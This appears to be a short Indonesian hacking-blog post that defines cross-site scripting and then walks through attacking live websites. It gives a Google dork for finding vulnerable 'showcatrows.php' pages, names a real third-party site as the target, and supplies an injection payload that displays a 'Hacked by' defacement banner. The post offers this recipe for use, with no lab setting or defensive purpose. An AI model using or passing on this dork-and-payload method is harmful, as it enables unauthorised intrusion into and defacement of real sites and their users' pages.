XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.
Dork: inurl:"/showcatrows.php?CategoryID="
Gunakan dork diatas untuk mencari target di google.
Misal disini kita menemukan target yaitu
http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13
Maka tambahkan exploit atau scriptnya
"><marquee><h1>Hacked by d0rkc0d3</h1></marquee> dibelakang URL.
0 comments:
Post a Comment
Silahkan Berkomentar dengan Baik Dan Bijak